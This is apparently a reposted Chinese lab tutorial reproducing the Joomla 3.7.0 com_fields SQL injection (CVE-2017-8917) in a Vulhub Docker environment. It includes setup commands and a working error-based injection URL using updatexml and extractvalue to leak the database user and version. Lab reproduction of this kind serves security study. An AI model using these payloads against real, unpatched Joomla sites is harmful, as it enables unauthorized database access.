利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境)

Vulnhub官方复现教程

https://vulhub.org/#/environments/joomla/CVE-2017-8917/

漏洞原理

com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击。

Joomla于5月17日发布了新版本3.7.1,(https://www.joomla.org/announcements/release-news/5705-joomla-3-7-1-release.html),本次更新中修复一个高危SQL注入漏洞(https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html),成功利用该漏洞后攻击者可以在未授权的情况下进行SQL注入。

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/joomla/CVE-2017-8917

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:3分钟
环境启动后,访问http://your-ip:8080即可看到Joomla的安装界面,当前环境的数据库信息为:

数据库地址:mysql:3306
用户:root
密码:root
数据库名:joomla
填入上述信息,正常安装即可。
利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境_第1张图片
【注意】记得删除installation 目录
利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境_第2张图片

漏洞复现

安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息:
利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境_第3张图片
注意看
在这里插入图片描述
updatexml(0x23,concat(1,user()),1)改为

extractvalue(666,concat(0x3a,version(),0x3a))

在这里插入图片描述

你可能感兴趣的:(渗透)